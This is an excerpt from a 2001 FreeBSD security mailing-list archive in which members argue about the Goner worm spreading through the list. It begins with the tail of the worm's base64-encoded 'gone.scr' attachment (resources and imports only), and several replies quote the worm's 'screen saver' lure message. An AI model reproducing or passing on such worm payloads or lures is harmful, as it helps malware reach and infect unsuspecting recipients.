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
aXQEdHRneHZ2dwmDgoKCgoKDgoKCg4QAAAAAeXl5eXl4eHh5jHWBaYFpaWl1dWmBaXR0dATvdnZ3
CYOCg4ODgo6OgoJ2g4QAAAAAeXl5eXl5eHh5jIGBgYGBgYFpaWl0dAQEdGdrjnYJCYODg4OCj4+P
goKDhHgAAAAAeXl5eXl5eXh4i4F1gYGBgYFpgXV0dHR0BGdggoIJCXeDg4OCj4+Oj4N3hHgAAAAA
eXl5eXl5eXh4eYuBdWmBgWlpgWlpdAQEdGdggnYJCYODg4OCgo+OjoMJhIQAAAAAeXl5eXl5eXh4
eHmAdWmBgWlpgWlpdAR0dGd4gmoJd4ODg4OCgoKCgoODd4QAAAAAeXl5eXl5eXl4d3l/dXWBgYFp
aYGBdHR0BGd4dnZ3d3d3g4ODgoKDg4ODg3cAAAAAeXl5eXl5eXl4a3l/dHVpaWlpaWh0dGh0dGZr
dnZ3CQl3d4ODg4ODg4N3g4MAAAAAeW16eXl5eXl4a3h6gHWBdHR0dHR0BAR0aG1qgmoJCQkJd4OD
g4ODg4ODg3cAAAAAeXp6eXl5eXl4eHh5boB1dIAEBARzcwR0f2x2ancJCQl3d4ODg4ODg4MJg3cA
AAAAeXp6eXl5eXl5bHhrbGeAdARzc3Nzc3R/bHd3CQkJCQl3d3eDg4ODg3d3CQkAAAAAbXp6eXl5
eXl5eWx4eHl6f3Nzc3Nzf20Jg3cJCQkJCXd3d3d3d3d3d3d3dwkAAAAAbXp6bXl5eXl5eXl5bHhs
eW1tbXlteXh4eAl4d3eEhIR3hISEhHd3d3d3g4QAAAAAbW16bW15eXl5eXl5bHh5eXh4eHl4eHh4
d3d4CXd3dwmEhAmEhHeEhIQJd4QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAA
AP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA
//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD/
/wAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//
AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8A
AAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAA
AAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD//yQTAgAAAAEAAQAw
MAAAAQAIAKgOAAAxdfAQAgA0AjQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAA
vQTv/gAAAQAAAAAAAwAAAAAAAAADAAAAAAAAAAAAAAAEAAAAAQAAAAAAAAAAAAAAAAAAAEQAAAAA
AFYAYQByAEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAA
AAAJBLAElAEAAAEAUwB0AHIAaQBuAGcARgBpAGwAZQBJAG4AZgBvAAAAcAEAAAEAMAA0ADAAOQAw
ADQAQgAwAAAAUAA2AAEAQwBvAG0AbQBlAG4AdABzAAAAUABvAHcAZQByACAAUAB1AGYAZgAgAGcA
aQByAGwAcwAgAHIAdQBsAHoAIQAgACAAOwA+AAAAAAA0ABQAAQBQAHIAbwBkAHUAYwB0AE4AYQBt
AGUAAAAAAHAAZQBuAHQAYQBnAG8AbgBlAAAANAAUAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAA
AAAwAC4AMAAwAC4AMAAwADAAMwAAADgAFAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAA
ADAALgAwADAALgAwADAAMAAzAAAALAAKAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABnAG8A
bgBlAAAAAAA8ABIAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAZwBvAG4AZQAu
AHMAYwByAAAAAAAAAAAAAAAAAAAAAAA4YgIAIGICAAAAAAAAAAAAAAAAAEViAgAwYgIAAAAAAAAA
AAAAAAAAAAAAAAAAAABSYgIAYGICAHBiAgAAAAAARQIAgAAAAABLRVJORUwzMi5ETEwATVNWQlZN
NjAuRExMAAAATG9hZExpYnJhcnlBAABHZXRQcm9jQWRkcmVzcwAARXhpdFByb2Nlc3MAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

------_=_NextPart_000_01C17D09.257421B0--

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 14: 5:21 2001
Delivered-To: freebsd-security@freebsd.org
Received: from [210.55.16.179] (nhfw5501.cologic.co.nz [210.55.16.179])
	by hub.freebsd.org (Postfix) with SMTP id 548D937B437
	for <freebsd-security@freebsd.org>; Tue,  4 Dec 2001 14:04:42 -0800 (PST)
Received: from nhex1101.cologic.co.nz by [210.55.16.179]
          via smtpd (for hub.FreeBSD.org [216.136.204.18]) with SMTP; 4 Dec 2001 22:06:22 UT
Received: by nhex1101.cologic.co.nz with Internet Mail Service (5.5.2653.19)
	id <Y18GD5XM>; Wed, 5 Dec 2001 11:05:17 +1300
Message-ID: <C1EC3AA970F8D311BA4D0050BAB07BA870491B@nhex1101.cologic.co.nz>
From: Arjen De Landgraaf <arjen.de.landgraaf@cologic.co.nz>
To: freebsd-security@freebsd.org
Subject: Mail list is posting gone virus!!!!
Date: Wed, 5 Dec 2001 11:05:17 +1300 
Importance: high
X-Priority: 1
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-2"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


Not a good advertisement for freebsd security.
We have already received 3 copies of the gone virus through your list.

Arjen de Landgraaf
E-Secure-IT
Auckland
New Zealand

www.e-secure-it.co.nz

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 14:13:32 2001
Delivered-To: freebsd-security@freebsd.org
Received: from elvis.mu.org (elvis.mu.org [216.33.66.196])
	by hub.freebsd.org (Postfix) with ESMTP id 1AD7B37B416
	for <freebsd-security@freebsd.org>; Tue,  4 Dec 2001 14:13:27 -0800 (PST)
Received: by elvis.mu.org (Postfix, from userid 1192)
	id 9B4B781D01; Tue,  4 Dec 2001 16:13:21 -0600 (CST)
Date: Tue, 4 Dec 2001 16:13:21 -0600
From: Alfred Perlstein <bright@mu.org>
To: Arjen De Landgraaf <arjen.de.landgraaf@cologic.co.nz>
Cc: freebsd-security@freebsd.org
Subject: Re: Mail list is posting gone virus!!!!
Message-ID: <20011204161321.T92148@elvis.mu.org>
References: <C1EC3AA970F8D311BA4D0050BAB07BA870491B@nhex1101.cologic.co.nz>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <C1EC3AA970F8D311BA4D0050BAB07BA870491B@nhex1101.cologic.co.nz>; from arjen.de.landgraaf@cologic.co.nz on Wed, Dec 05, 2001 at 11:05:17AM +1300
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

* Arjen De Landgraaf <arjen.de.landgraaf@cologic.co.nz> [011204 16:08] wrote:
> 
> Not a good advertisement for freebsd security.

It's a microsoft virus, every list has it's bunch of Lusers
subscribed. :)

> We have already received 3 copies of the gone virus through your list.

The list is not moderated.

-- 
-Alfred Perlstein [alfred@freebsd.org]
'Instead of asking why a piece of software is using "1970s technology,"
 start asking why software is ignoring 30 years of accumulated wisdom.'
                           http://www.morons.org/rants/gpl-harmful.php3

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 14:14:33 2001
Delivered-To: freebsd-security@freebsd.org
Received: from michael.lhtek.com (michael.lhtek.com [63.145.41.4])
	by hub.freebsd.org (Postfix) with SMTP id BF6D237B41B
	for <freebsd-security@freebsd.org>; Tue,  4 Dec 2001 14:14:21 -0800 (PST)
Received: (qmail 24859 invoked by uid 1005); 4 Dec 2001 22:14:21 -0000
Received: from unknown (HELO JGordon) (64.57.224.219)
  by michael.lhtek.com with SMTP; 4 Dec 2001 22:14:20 -0000
Message-ID: <01d701c17d10$a8b334b0$0001300a@lhtech.lhtek.com>
From: "J e f f r e y   D .   G o r d o n" <JGordon@Alliante.com>
To: <freebsd-security@freebsd.org>
References: <C1EC3AA970F8D311BA4D0050BAB07BA870491B@nhex1101.cologic.co.nz>
Subject: Re: Mail list is posting gone virus!!!!
Date: Tue, 4 Dec 2001 16:11:44 -0600
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-2"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-Virus-Scanned: by AMaViS perl-11
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Arjen,

    This Internet Worm has NOTHING to do with freebsd's security. :-)

    This has everything to do with Internet Worms taking advantage of other
operating systems and applications.

    Virus checking is not a FreeBSD standard thing to do (but it can do it
quite well if you want it to, /usr/ports/security/amavis-perl ).

    To my knowledge the FreeBSD mailing lists have too much traffic to run a
virus checker (and I don't blame them for not checking if they don't), plus
this virus pattern was RELEASED THIS AFTERNOON.

    Any sane NetAdmin would be checking for new definitions only once a day,
during the early morning or late evening.

    (Internet Worm security is in the hands of the Computer Owner who
usually gets an OEM copy of a virus checker with his./her computer. If the
user doesn't wish to update their virus definitions regularly you get this
for more than a week).

    Please don't attack FreeBSD's rock solid Internet security as a server
to problems with other environments.

                Cheers!
                        Jeff

----- Original Message -----
From: "Arjen De Landgraaf" <arjen.de.landgraaf@cologic.co.nz>
To: <freebsd-security@freebsd.org>
Sent: Tuesday, December 04, 2001 4:05 PM
Subject: Mail list is posting gone virus!!!!


>
> Not a good advertisement for freebsd security.
> We have already received 3 copies of the gone virus through your list.
>
> Arjen de Landgraaf
> E-Secure-IT
> Auckland
> New Zealand
>
> www.e-secure-it.co.nz
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 14:15:42 2001
Delivered-To: freebsd-security@freebsd.org
Received: from www.donfishback.com (www.donfishback.com [206.28.50.220])
	by hub.freebsd.org (Postfix) with ESMTP id 13E7637B416
	for <freebsd-security@FreeBSD.ORG>; Tue,  4 Dec 2001 14:15:39 -0800 (PST)
Received: from bryanslaptop (bdsl.66.12.25.162.gte.net [66.12.25.162])
	by www.donfishback.com (8.11.3/8.11.3) with ESMTP id fB4MFCe96047
	for <freebsd-security@FreeBSD.ORG>; Tue, 4 Dec 2001 17:15:12 -0500 (EST)
	(envelope-from webmaster@donfishback.com)
From: "webmaster" <webmaster@donfishback.com>
To: "Owner-Freebsd-Security" <freebsd-security@FreeBSD.ORG>
Subject: RE: Hi
Date: Tue, 4 Dec 2001 17:15:30 -0500
Message-ID: <KKEDJAMJCHBEINDLGJGGMEODDGAA.webmaster@donfishback.com>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


If you are not capable of preventing virus infection from a known unsafe
attachment or file type, You should probably go back to the basics and spare
the rest of us on this list by taking us out of your address book.

Thanks
Michael

-----Original Message-----
From: owner-freebsd-security@FreeBSD.ORG
[mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Baldwin, Peter
Sent: Tuesday, December 04, 2001 4:18 PM
To: local.freebsd.security
Subject: Hi


How are you ?
When I saw this screen saver, I immediately thought about you
I am in a harry, I promise you will love it!


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 14:29: 6 2001
Delivered-To: freebsd-security@freebsd.org
Received: from kira.epconline.net (kira.epconline.net [207.206.185.2])
	by hub.freebsd.org (Postfix) with ESMTP id ACE4437B41D
	for <freebsd-security@FreeBSD.ORG>; Tue,  4 Dec 2001 14:27:39 -0800 (PST)
Received: from isp4 (betterguard.epconline.net [207.206.185.193])
	by kira.epconline.net (8.11.4/8.11.4) with SMTP id fB4MRcg05291
	for <freebsd-security@FreeBSD.ORG>; Tue, 4 Dec 2001 16:27:38 -0600 (CST)
Reply-To: <carock@epctech.com>
From: "Chuck Rock" <carock@epctech.com>
To: "Owner-Freebsd-Security" <freebsd-security@FreeBSD.ORG>
Subject: RE: Hi (off-topic)
Date: Tue, 4 Dec 2001 16:29:43 -0600
Message-ID: <JDEAIDLKPMMILNJHADGCKEAPEGAA.carock@epctech.com>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
In-Reply-To: <KKEDJAMJCHBEINDLGJGGMEODDGAA.webmaster@donfishback.com>
Importance: Normal
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

It's the same as saying if you can't protect your own equipment then stop
using a computer.

I think you should quit blaming the admins. A lot of people got this virus
even though they had virus scanners in place. Sometimes sh*t happens. Deal
with it.

My 2 cents.

Chuck

-----Original Message-----
From: owner-freebsd-security@FreeBSD.ORG
[mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of webmaster
Sent: Tuesday, December 04, 2001 4:16 PM
To: Owner-Freebsd-Security
Subject: RE: Hi


If you are not capable of preventing virus infection from a known unsafe
attachment or file type, You should probably go back to the basics and spare
the rest of us on this list by taking us out of your address book.

Thanks
Michael

-----Original Message-----
From: owner-freebsd-security@FreeBSD.ORG
[mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Baldwin, Peter
Sent: Tuesday, December 04, 2001 4:18 PM
To: local.freebsd.security
Subject: Hi


How are you ?
When I saw this screen saver, I immediately thought about you
I am in a harry, I promise you will love it!


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 14:36:24 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.fpsn.net (mail.fpsn.net [63.224.69.57])
	by hub.freebsd.org (Postfix) with ESMTP id EAC4637B417
	for <freebsd-security@FreeBSD.ORG>; Tue,  4 Dec 2001 14:36:18 -0800 (PST)
Received: from fpsn.net (control.fpsn.net [63.224.69.60])
	(authenticated)
	by mail.fpsn.net (8.11.6/8.11.6) with ESMTP id fB4MaCp94562;
	Tue, 4 Dec 2001 15:36:12 -0700 (MST)
Message-ID: <3C0D4FBD.17F0BA07@fpsn.net>
Date: Tue, 04 Dec 2001 15:35:41 -0700
From: Colin Faber <cfaber@fpsn.net>
Organization: fpsn.net, Inc.
X-Mailer: Mozilla 4.78 [en] (Windows NT 5.0; U)
X-Accept-Language: en
MIME-Version: 1.0
To: carock@epctech.com
Cc: Owner-Freebsd-Security <freebsd-security@FreeBSD.ORG>
Subject: Re: Hi (off-topic)
References: <JDEAIDLKPMMILNJHADGCKEAPEGAA.carock@epctech.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Possible solution, block any messages with MS based files? ;-)


Chuck Rock wrote:
> 
> It's the same as saying if you can't protect your own equipment then stop
> using a computer.
> 
> I think you should quit blaming the admins. A lot of people got this virus
> even though they had virus scanners in place. Sometimes sh*t happens. Deal
> with it.
> 
> My 2 cents.
> 
> Chuck
> 
> -----Original Message-----
> From: owner-freebsd-security@FreeBSD.ORG
> [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of webmaster
> Sent: Tuesday, December 04, 2001 4:16 PM
> To: Owner-Freebsd-Security
> Subject: RE: Hi
> 
> If you are not capable of preventing virus infection from a known unsafe
> attachment or file type, You should probably go back to the basics and spare
> the rest of us on this list by taking us out of your address book.
> 
> Thanks
> Michael
> 
> -----Original Message-----
> From: owner-freebsd-security@FreeBSD.ORG
> [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Baldwin, Peter
> Sent: Tuesday, December 04, 2001 4:18 PM
> To: local.freebsd.security
> Subject: Hi
> 
> How are you ?
> When I saw this screen saver, I immediately thought about you
> I am in a harry, I promise you will love it!
> 
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
> 
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message

-- 
Colin Faber
(303) 859-1491
fpsn.net, Inc.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 14:37:46 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail2.uniserve.com (mail2.uniserve.com [204.244.156.10])
	by hub.freebsd.org (Postfix) with ESMTP id 0188837B417
	for <freebsd-security@freebsd.org>; Tue,  4 Dec 2001 14:37:38 -0800 (PST)
Received: from landons.vpp-office.uniserve.ca ([216.113.198.10] helo=pirahna.uniserve.com)
	by mail2.uniserve.com with esmtp (Exim 3.13 #1)
	id 16BOC0-000Cmj-00
	for freebsd-security@FreeBSD.ORG; Tue, 04 Dec 2001 14:37:37 -0800
Message-Id: <5.1.0.14.0.20011204143542.02eb4e80@pop.uniserve.com>
X-Sender: landons@pop.uniserve.com
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Tue, 04 Dec 2001 14:37:34 -0800
To: <freebsd-security@FreeBSD.ORG>
From: Landon Stewart <landons@uniserve.com>
Subject: RE: Hi (off-topic)
In-Reply-To: <JDEAIDLKPMMILNJHADGCKEAPEGAA.carock@epctech.com>
References: <KKEDJAMJCHBEINDLGJGGMEODDGAA.webmaster@donfishback.com>
Mime-Version: 1.0
Content-Type: multipart/alternative;
	boundary="=====================_2003380==_.ALT"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

--=====================_2003380==_.ALT
Content-Type: text/plain; charset="us-ascii"; format=flowed

That would mean they either clicked on it (not smart) or were running MS 
Outlook and it was automatically executed (not smart).

Either way, its not the list, or the owner of the list's fault.


At 04:29 PM 12/4/2001 -0600, Chuck Rock wrote:
>It's the same as saying if you can't protect your own equipment then stop
>using a computer.
>
>I think you should quit blaming the admins. A lot of people got this virus
>even though they had virus scanners in place. Sometimes sh*t happens. Deal
>with it.
>
>My 2 cents.
>
>Chuck
>
>-----Original Message-----
>From: owner-freebsd-security@FreeBSD.ORG
>[mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of webmaster
>Sent: Tuesday, December 04, 2001 4:16 PM
>To: Owner-Freebsd-Security
>Subject: RE: Hi
>
>
>
>If you are not capable of preventing virus infection from a known unsafe
>attachment or file type, You should probably go back to the basics and spare
>the rest of us on this list by taking us out of your address book.
>
>Thanks
>Michael
>
>-----Original Message-----
>From: owner-freebsd-security@FreeBSD.ORG
>[mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Baldwin, Peter
>Sent: Tuesday, December 04, 2001 4:18 PM
>To: local.freebsd.security
>Subject: Hi
>
>
>How are you ?
>When I saw this screen saver, I immediately thought about you
>I am in a harry, I promise you will love it!
>
>
>
>To Unsubscribe: send mail to majordomo@FreeBSD.org
>with "unsubscribe freebsd-security" in the body of the message
>
>
>To Unsubscribe: send mail to majordomo@FreeBSD.org
>with "unsubscribe freebsd-security" in the body of the message

---
Landon Stewart

Right of Use Disclaimer:
"The sender intends this message for a specific recipient and, as it may 
contain information that is privileged or confidential, any use, 
dissemination, forwarding, or copying by anyone without permission from the 
sender is prohibited. Personal e-mail may contain views that are not 
necessarily those of the company."

--=====================_2003380==_.ALT
Content-Type: text/html; charset="us-ascii"

<html>
That would mean they either clicked on it (not smart) or were running MS
Outlook and it was automatically executed (not smart).<br><br>
Either way, its not the list, or the owner of the list's fault.<br><br>
<br>
At 04:29 PM 12/4/2001 -0600, Chuck Rock wrote:<br>
<blockquote type=cite class=cite cite>It's the same as saying if you
can't protect your own equipment then stop<br>
using a computer.<br><br>
